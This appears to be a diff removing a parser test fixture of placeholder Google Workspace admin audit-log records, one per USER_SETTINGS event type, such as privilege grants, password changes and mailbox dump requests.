-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_3LO_DEVICE_TOKENS","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_3LO_TOKEN","parameters":[{"name":"APP_ID","value":"id"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ADD_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ADD_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"GRANT_ADMIN_PRIVILEGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_ADMIN_PRIVILEGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_ASP","parameters":[{"name":"ASP_ID","value":"id"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"TOGGLE_AUTOMATIC_CONTACT_SHARING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"BULK_UPLOAD","parameters":[{"name":"BULK_UPLOAD_FAIL_USERS_NUMBER","value":"1"},{"name":"BULK_UPLOAD_TOTAL_USERS_NUMBER","value":"10"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"BULK_UPLOAD_NOTIFICATION_SENT","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CANCEL_USER_INVITE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_CUSTOM_FIELD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_CUSTOM_FIELD","value":"custom"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_EXTERNAL_ID","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_GENDER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_IM","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ENABLE_USER_IP_WHITELIST","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_KEYWORD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_LANGUAGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_LOCATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_ORGANIZATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_PHONE_NUMBER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_RELATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_ADDRESS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CREATE_EMAIL_MONITOR","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"BEGIN_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"EMAIL_MONITOR_DEST_EMAIL","value":"dest@example.com"},{"name":"EMAIL_MONITOR_LEVEL_CHAT","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL","value":"info"},{"name":"END_DATE_TIME","value":"2002-10-02T16:00:00Z"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CREATE_DATA_TRANSFER_REQUEST","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DESTINATION_USER_EMAIL","value":"dest@example.com"},{"name":"APPLICATION_NAME","value":"a,b,c"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"GRANT_DELEGATED_ADMIN_PRIVILEGES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_ACCOUNT_INFO_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"REQUEST_ID","value":"id"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_EMAIL_MONITOR","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"EMAIL_MONITOR_DEST_EMAIL","value":"dest@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_MAILBOX_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"REQUEST_ID","value":"id"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_FIRST_NAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"GMAIL_RESET_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"GMAIL_RESET_REASON","value":"reason"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_LAST_NAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"MAIL_ROUTING_DESTINATION_ADDED","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"MAIL_ROUTING_DESTINATION_REMOVED","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ADD_NICKNAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"USER_NICKNAME","value":"nick"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REMOVE_NICKNAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"USER_NICKNAME","value":"nick"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_PASSWORD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_PASSWORD_ON_NEXT_LOGIN","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DOWNLOAD_PENDING_INVITES_LIST"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REMOVE_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REMOVE_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REQUEST_ACCOUNT_INFO","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REQUEST_MAILBOX_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"BEGIN_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"EMAIL_EXPORT_INCLUDE_DELETED","value":"true"},{"name":"EMAIL_EXPORT_PACKAGE_CONTENT","value":"contents"},{"name":"SEARCH_QUERY_FOR_DUMP","value":"foo bar"},{"name":"END_DATE_TIME","value":"2002-10-02T16:00:00Z"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"RESEND_USER_INVITE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"RESET_SIGNIN_COOKIES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"SECURITY_KEY_REGISTERED_FOR_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_SECURITY_KEY","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USER_INVITE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"VIEW_TEMP_PASSWORD","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"TURN_OFF_2_STEP_VERIFICATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNBLOCK_USER_SESSION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNENROLL_USER_FROM_TITANIUM","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ARCHIVE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UPDATE_BIRTHDATE","parameters":[{"name":"BIRTHDATE","value":"2002-10-02T15:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CREATE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DOWNGRADE_USER_FROM_GPLUS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USER_ENROLLED_IN_TWO_STEP_VERIFICATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DOWNLOAD_USERLIST_CSV"}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"MOVE_USER_TO_ORG_UNIT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"RENAME_USER","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNENROLL_USER_FROM_STRONG_AUTH","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} 
